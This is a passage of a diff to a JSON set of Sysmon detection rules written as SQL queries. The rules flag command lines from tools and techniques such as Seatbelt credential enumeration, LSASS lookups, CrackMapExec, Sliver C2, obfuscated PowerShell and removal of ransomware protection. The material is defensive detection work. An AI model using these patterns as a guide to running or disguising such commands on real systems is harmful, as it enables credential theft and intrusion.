WHERE (EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%/e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Local\\\\Temp\\\\Errors.bat%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Seatbelt.exe' ESCAPE '\\' OR OriginalFileName = 'Seatbelt.exe' OR Description = 'Seatbelt' OR (CommandLine LIKE '% DpapiMasterKeys%' ESCAPE '\\' OR CommandLine LIKE '% InterestingProcesses%' ESCAPE '\\' OR CommandLine LIKE '% InterestingFiles%' ESCAPE '\\' OR CommandLine LIKE '% CertificateThumbprints%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumBookmarks%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumHistory%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumPresence%' ESCAPE '\\' OR CommandLine LIKE '% CloudCredentials%' ESCAPE '\\' OR CommandLine LIKE '% CredEnum%' ESCAPE '\\' OR CommandLine LIKE '% CredGuard%' ESCAPE '\\' OR CommandLine LIKE '% FirefoxHistory%' ESCAPE '\\' OR CommandLine LIKE '% ProcessCreationEvents%' ESCAPE '\\')) OR ((CommandLine LIKE '% -group=misc%' ESCAPE '\\' OR CommandLine LIKE '% -group=remote%' ESCAPE '\\' OR CommandLine LIKE '% -group=chromium%' ESCAPE '\\' OR CommandLine LIKE '% -group=slack%' ESCAPE '\\' OR CommandLine LIKE '% -group=system%' ESCAPE '\\' OR CommandLine LIKE '% -group=user%' ESCAPE '\\' OR CommandLine LIKE '% -group=all%' ESCAPE '\\') AND CommandLine LIKE '% -outputfile=%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_empiremonkey.yml" + "filename": "proc_creation_win_pua_seatbelt.yml" }, { - "title": "Potential MuddyWater APT Activity", - "id": "36222790-0d43-4fe8-86e4-674b27809543", - "status": "test", - "description": "Detects potential Muddywater APT activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Findstr LSASS", + "id": "fe63010f-8823-4864-a96b-a7b4a0f7b929", + "status": "experimental", + "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the 
LSASS process PID", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.g0069" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%vbscript:Close(Execute(\"CreateObject(%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%-w 1 -exec Bypass%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%Win32\\_OperatingSystem%' ESCAPE '\\' AND CommandLine LIKE '%Win32\\_NetworkAdapterConfiguration%' ESCAPE '\\' AND CommandLine LIKE '%root\\\\SecurityCenter2%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.DNS]%' ESCAPE '\\') OR (CommandLine LIKE '%[Convert]::ToBase64String%' ESCAPE '\\' AND CommandLine LIKE '%[System.Text.Encoding]::UTF8.GetString]%' ESCAPE '\\' AND CommandLine LIKE '%GetResponse().GetResponseStream()%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.HttpWebRequest]::Create(%' ESCAPE '\\' AND CommandLine LIKE '%-bxor %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%lsass%' ESCAPE '\\') OR (CommandLine LIKE '% /i lsass.exe%' ESCAPE '\\' OR CommandLine LIKE '% /i \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe \"lsass%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_muddywater_activity.yml" + "filename": "proc_creation_win_findstr_lsass.yml" }, { - "title": "Potential Reconnaissance Activity Via GatherNetworkInfo.VBS", - "id": "575dce0c-8139-4e30-9295-1ee75969f7fe", + "title": "Renamed 
AutoHotkey.EXE Execution", + "id": "0f16d9cf-0616-45c8-8fad-becc11b5a41c", "status": "test", - "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", - "author": "blueteamer8699", + "description": "Detects execution of a renamed autohotkey.exe binary based on PE metadata fields", + "author": "Nasreddine Bencherchali", "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1615", - "attack.t1059.005" + "attack.defense_evasion" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR OriginalFileName IN ('cscript.exe', 'wscript.exe')) AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\')" - ], - "filename": "proc_creation_win_lolbin_gather_network_info.yml" - }, - { - "title": "HackTool - Sliver C2 Implant Activity Pattern", - "id": "42333b2c-b425-441c-b70e-99404a17170f", - "status": "experimental", - "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1059" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%AutoHotkey%' ESCAPE '\\' OR Description LIKE '%AutoHotkey%' ESCAPE '\\' OR OriginalFileName IN ('AutoHotkey.exe', 'AutoHotkey.rc')) AND NOT ((Image LIKE 
'%\\\\AutoHotkey.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkey32.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkey32\\_UIA.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkey64.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkey64\\_UIA.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyA32.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyA32\\_UIA.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyU32.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyU32\\_UIA.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyU64.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyU64\\_UIA.exe' ESCAPE '\\') OR Image LIKE '%\\\\AutoHotkey%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sliver_c2_execution_pattern.yml" + "filename": "proc_creation_win_renamed_autohotkey.yml" }, { - "title": "Arbitrary File Download Via MSPUB.EXE", - "id": "3b3c7f55-f771-4dd6-8a6e-08d057a17caf", - "status": "experimental", - "description": "Detects usage of \"MSPUB\" (Microsoft Publisher) to download arbitrary files", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - CrackMapExec Execution Patterns", + "id": "058f4380-962d-40a5-afce-50207d36d7e2", + "status": "stable", + "description": "Detects various execution patterns of the CrackMapExec pentesting framework", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1218" + "attack.t1047", + "attack.t1053", + "attack.t1059.003", + "attack.t1059.001", + "attack.s0106" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR OriginalFileName = 'MSPUB.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%cmd.exe /Q /c % 
1> \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > %\\\\Temp\\\\% 2>&1' ESCAPE '\\') AND (CommandLine LIKE '%powershell.exe -exec bypass -noni -nop -w 1 -C \"%' ESCAPE '\\' OR CommandLine LIKE '%powershell.exe -noni -nop -w 1 -enc %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_mspub_download.yml" + "filename": "proc_creation_win_hktl_crackmapexec_execution_patterns.yml" }, { - "title": "Suspicious Powercfg Execution To Change Lock Screen Timeout", - "id": "f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b", + "title": "Taskmgr as LOCAL_SYSTEM", + "id": "9fff585c-c33e-4a86-b3cd-39312079a65f", "status": "experimental", - "description": "Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout", - "author": "frack113", + "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\powercfg.exe' ESCAPE '\\' OR OriginalFileName = 'PowerCfg.exe') AND ((CommandLine LIKE '%/setacvalueindex %' ESCAPE '\\' AND CommandLine LIKE '%SCHEME\\_CURRENT%' ESCAPE '\\' AND CommandLine LIKE '%SUB\\_VIDEO%' ESCAPE '\\' AND CommandLine LIKE '%VIDEOCONLOCK%' ESCAPE '\\') OR (CommandLine LIKE '%-change %' ESCAPE '\\' AND CommandLine LIKE '%-standby-timeout-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND Image LIKE '%\\\\taskmgr.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_powercfg_execution.yml" + "filename": "proc_creation_win_taskmgr_localsystem.yml" }, { - "title": 
"Whoami.EXE Execution Anomaly", - "id": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", + "title": "Suspicious Processes Spawned by WinRM", + "id": "5cc2cda8-f261-4d88-a2de-e9e193c86716", "status": "experimental", - "description": "Detects the execution of whoami.exe with suspicious parent processes.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious processes including shells spawnd from WinRM host process", + "author": "Andreas Hunkeler (@Karneades), Markus Neis", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Legitimate WinRM usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND NOT (((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe' ESCAPE '\\') OR (ParentImage = '') OR (ParentImage = '')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\bitsadmin.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_whoami_parent_anomaly.yml" + "filename": "proc_creation_win_winrm_susp_child_process.yml" }, { - "title": "Use NTFS Short Name in Command Line", - "id": "dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795", - "status": "experimental", - "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious PowerShell Parameter Substring", + "id": "36210e0d-5b19-485d-a087-c096088885f0", + "status": "test", + "description": "Detects suspicious PowerShell invocation with a parameter substring", + "author": "Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." 
+ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%~1.exe%' ESCAPE '\\' OR CommandLine LIKE '%~1.bat%' ESCAPE '\\' OR CommandLine LIKE '%~1.msi%' ESCAPE '\\' OR CommandLine LIKE '%~1.vbe%' ESCAPE '\\' OR CommandLine LIKE '%~1.vbs%' ESCAPE '\\' OR CommandLine LIKE '%~1.dll%' ESCAPE '\\' OR CommandLine LIKE '%~1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%~1.js%' ESCAPE '\\' OR CommandLine LIKE '%~1.hta%' ESCAPE '\\' OR CommandLine LIKE '%~2.exe%' ESCAPE '\\' OR CommandLine LIKE '%~2.bat%' ESCAPE '\\' OR CommandLine LIKE '%~2.msi%' ESCAPE '\\' OR CommandLine LIKE '%~2.vbe%' ESCAPE '\\' OR CommandLine LIKE '%~2.vbs%' ESCAPE '\\' OR CommandLine LIKE '%~2.dll%' ESCAPE '\\' OR CommandLine LIKE '%~2.ps1%' ESCAPE '\\' OR CommandLine LIKE '%~2.js%' ESCAPE '\\' OR CommandLine LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\xampp\\\\vcredist\\\\VCREDI~1.EXE%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% -windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% -windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% -windowst h%' ESCAPE '\\' OR CommandLine LIKE '% -windows h%' ESCAPE '\\' OR CommandLine LIKE '% -windo h%' ESCAPE '\\' OR CommandLine LIKE '% -wind h%' ESCAPE '\\' OR CommandLine LIKE '% -win h%' ESCAPE '\\' OR CommandLine LIKE '% -wi h%' ESCAPE '\\' OR CommandLine LIKE '% -win h %' ESCAPE '\\' OR CommandLine LIKE '% -win hi %' ESCAPE '\\' OR CommandLine LIKE '% -win hid %' ESCAPE '\\' OR CommandLine LIKE '% -win hidd %' ESCAPE '\\' OR CommandLine LIKE '% -win hidde %' ESCAPE '\\' 
OR CommandLine LIKE '% -NoPr %' ESCAPE '\\' OR CommandLine LIKE '% -NoPro %' ESCAPE '\\' OR CommandLine LIKE '% -NoProf %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% -nonin %' ESCAPE '\\' OR CommandLine LIKE '% -nonint %' ESCAPE '\\' OR CommandLine LIKE '% -noninte %' ESCAPE '\\' OR CommandLine LIKE '% -noninter %' ESCAPE '\\' OR CommandLine LIKE '% -nonintera %' ESCAPE '\\' OR CommandLine LIKE '% -noninterac %' ESCAPE '\\' OR CommandLine LIKE '% -noninteract %' ESCAPE '\\' OR CommandLine LIKE '% -noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% -noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% -encodedC %' ESCAPE '\\' OR CommandLine LIKE '% -encoded %' ESCAPE '\\' OR CommandLine LIKE '% -encode %' ESCAPE '\\' OR CommandLine LIKE '% -encod %' ESCAPE '\\' OR CommandLine LIKE '% -enco %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% -executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% -executionpol %' ESCAPE '\\' OR CommandLine LIKE '% -executionpo %' ESCAPE '\\' OR CommandLine LIKE '% -executionp %' ESCAPE '\\' OR CommandLine LIKE '% -execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass%' ESCAPE '\\' OR CommandLine LIKE '% /windowstyle h 
%' ESCAPE '\\' OR CommandLine LIKE '% /windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% /windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% /windowst h%' ESCAPE '\\' OR CommandLine LIKE '% /windows h%' ESCAPE '\\' OR CommandLine LIKE '% /windo h%' ESCAPE '\\' OR CommandLine LIKE '% /wind h%' ESCAPE '\\' OR CommandLine LIKE '% /win h%' ESCAPE '\\' OR CommandLine LIKE '% /wi h%' ESCAPE '\\' OR CommandLine LIKE '% /win h %' ESCAPE '\\' OR CommandLine LIKE '% /win hi %' ESCAPE '\\' OR CommandLine LIKE '% /win hid %' ESCAPE '\\' OR CommandLine LIKE '% /win hidd %' ESCAPE '\\' OR CommandLine LIKE '% /win hidde %' ESCAPE '\\' OR CommandLine LIKE '% /NoPr %' ESCAPE '\\' OR CommandLine LIKE '% /NoPro %' ESCAPE '\\' OR CommandLine LIKE '% /NoProf %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% /nonin %' ESCAPE '\\' OR CommandLine LIKE '% /nonint %' ESCAPE '\\' OR CommandLine LIKE '% /noninte %' ESCAPE '\\' OR CommandLine LIKE '% /noninter %' ESCAPE '\\' OR CommandLine LIKE '% /nonintera %' ESCAPE '\\' OR CommandLine LIKE '% /noninterac %' ESCAPE '\\' OR CommandLine LIKE '% /noninteract %' ESCAPE '\\' OR CommandLine LIKE '% /noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% /noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% /ec %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% /encodedC %' ESCAPE '\\' OR CommandLine LIKE '% /encoded %' ESCAPE '\\' OR CommandLine LIKE '% /encode %' ESCAPE '\\' OR CommandLine LIKE '% /encod %' ESCAPE '\\' OR CommandLine LIKE '% /enco %' ESCAPE '\\' OR CommandLine LIKE '% /en %' ESCAPE '\\' OR CommandLine LIKE '% /executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% /executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% 
/executionpol %' ESCAPE '\\' OR CommandLine LIKE '% /executionpo %' ESCAPE '\\' OR CommandLine LIKE '% /executionp %' ESCAPE '\\' OR CommandLine LIKE '% /execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ep bypass%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_ntfs_short_name_use_cli.yml" + "filename": "proc_creation_win_powershell_susp_parameter_variation.yml" }, { - "title": "Potential Commandline Obfuscation Using Unicode Characters", - "id": "e0552b19-5a83-4222-b141-b36184bb8d79", + "title": "Potential MSTSC Shadowing Activity", + "id": "6ba5a05f-b095-4f0a-8654-b825f4f16334", "status": "test", - "description": "Detects potential commandline obfuscation using unicode characters.\nAdversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.\n", - "author": "frack113, Florian Roth (Nextron Systems)", + "description": "Detects RDP session hijacking by using MSTSC shadowing", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.lateral_movement", + "attack.t1563.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ˣ%' ESCAPE '\\' OR CommandLine LIKE '%˪%' ESCAPE '\\' OR CommandLine LIKE '%ˢ%' ESCAPE '\\') OR (CommandLine LIKE '%∕%' ESCAPE '\\' OR CommandLine LIKE '%⁄%' ESCAPE '\\') OR (CommandLine LIKE '%―%' ESCAPE '\\' OR CommandLine LIKE '%—%' ESCAPE '\\') OR (CommandLine LIKE '%â%' ESCAPE 
'\\' OR CommandLine LIKE '%€%' ESCAPE '\\' OR CommandLine LIKE '%£%' ESCAPE '\\' OR CommandLine LIKE '%¯%' ESCAPE '\\' OR CommandLine LIKE '%®%' ESCAPE '\\' OR CommandLine LIKE '%µ%' ESCAPE '\\' OR CommandLine LIKE '%¶%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%noconsentprompt%' ESCAPE '\\' AND CommandLine LIKE '%shadow:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_cli_obfuscation_unicode.yml" + "filename": "proc_creation_win_mstsc_rdp_hijack_shadowing.yml" }, { - "title": "Exploit for CVE-2017-0261", - "id": "864403a1-36c9-40a2-a982-4c9a45f7d833", + "title": "Raccine Uninstall", + "id": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", "status": "test", - "description": "Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262", + "description": "Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Several false positives identified, check for suspicious file names or locations (e.g. 
Temp folders)" + "Legitimate deinstallation by administrative staff" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\FLTLDR.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%taskkill %' ESCAPE '\\' AND CommandLine LIKE '%RaccineSettings.exe%' ESCAPE '\\') OR (CommandLine LIKE '%reg.exe%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Tray%' ESCAPE '\\') OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%/DELETE%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Rules Updater%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2017_0261.yml" + "filename": "proc_creation_win_susp_disable_raccine.yml" }, { - "title": "Script Interpreter Execution From Suspicious Folder", - "id": "1228c958-e64e-4e71-92ad-7d429f4138ba", + "title": "Suspicious Runscripthelper.exe", + "id": "eca49c87-8a75-4f13-9c73-a5a29e845f03", "status": "test", - "description": "Detects a suspicious script executions in temporary folders or folders accessible by environment variables", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of powershell scripts via Runscripthelper.exe", + "author": "Victor Sergeev, oscd.community", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1059", + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR 
Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass %' ESCAPE '\\' OR CommandLine LIKE '%/e:vbscript %' ESCAPE '\\' OR CommandLine LIKE '%/e:javascript %' ESCAPE '\\') OR OriginalFileName IN ('powershell.exe', 'pwsh.dll', 'mshta.exe', 'wscript.exe', 'cscript.exe', 'cmd.exe')) AND (Image LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Runscripthelper.exe' ESCAPE '\\' AND CommandLine LIKE '%surfacecheck%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml" + "filename": "proc_creation_win_lolbin_runscripthelper.yml" }, { - "title": "HackTool - Koadic Execution", - "id": "5cddf373-ef00-4112-ad72-960ac29bac34", - "status": "test", - "description": "Detects command line parameters used by Koadic hack tool", - "author": "wagga, Jonhnathan Ribeiro, oscd.community", + "title": "HackTool - SharpUp PrivEsc Tool Execution", + "id": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", + "status": "experimental", + "description": "Detects the use of SharpUp, a tool for local privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.007" + "attack.privilege_escalation", + "attack.t1615", + "attack.t1569.002", + "attack.t1574.005" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine 
